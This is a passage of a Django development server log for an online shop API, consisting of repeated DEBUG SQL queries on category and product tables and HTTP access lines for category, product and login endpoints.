"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:49:31,745 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:49:31,748 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:49:31,753 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:49:31,757 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:49:31,760 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:49:31,764 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:49:31,768 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:49:31,774 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:49:31,777 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:49:31,781 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:49:31,784 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:49:31,788 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:49:31,792 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:49:31,799 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:49:31,803 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:49:31,807 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:49:31,812 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:49:31,817 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:49:31,823 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:49:31,827 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:49:31,831 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:49:31,835 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:49:31,840 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:49:31,846 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:49:31,851 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:49:31,855 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:49:31,859 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:49:31,862 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:49:31,867 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:49:31,872 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:49:31,876 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:49:31,880 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:49:31,885 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:49:31,889 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:49:31] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:49:33,897 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:49:33,901 utils 20136 140506432534272 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:49:33] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 12:49:48] "GET / HTTP/1.0" 302 0 [16/Dec/2019 12:54:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 12:56:35,547 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:56:35,551 utils 20136 140506432534272 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:56:35] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 12:57:27,809 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:57:27,813 utils 20136 140506432534272 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:57:27] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 12:58:35,462 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:58:35,466 utils 20136 140506432534272 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:58:35] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 12:59:54] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:20:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:22:48] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:25:13] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:30:16] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:35:19] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:35:28] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:41:52] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:46:55] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:48:31] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:52:13] "GET / HTTP/1.0" 302 0 [16/Dec/2019 13:57:16] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:03:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 14:03:35,367 utils 20136 140506432534272 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rhy1a0ow3jct394lijupbypzd7q9bv5e' LIMIT 1; args=('rhy1a0ow3jct394lijupbypzd7q9bv5e',) DEBUG 2019-12-16 14:03:35,371 utils 20136 140506432534272 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rhy1a0ow3jct394lijupbypzd7q9bv5e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T14:03:35.368585+00:00'::timestamptz); args=('rhy1a0ow3jct394lijupbypzd7q9bv5e', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 14, 3, 35, 368585, tzinfo=)) [16/Dec/2019 14:03:35] "GET /login/?next=/ HTTP/1.0" 200 1786 [16/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:06:12] "GET / HTTP/1.0" 302 0 [16/Dec/2019 14:08:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 14:08:33,268 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 14:08:33,275 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 14:08:33,279 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 14:08:33,281 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 14:08:33,285 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 14:08:33,287 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 14:08:33,292 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 14:08:33,295 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 14:08:33,298 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 14:08:33,301 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 14:08:33,304 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 14:08:33,306 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 14:08:33,309 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 14:08:33,312 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 14:08:33,316 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 14:08:33,319 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 14:08:33,321 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 14:08:33,324 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 14:08:33,327 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 14:08:33,332 utils 20136 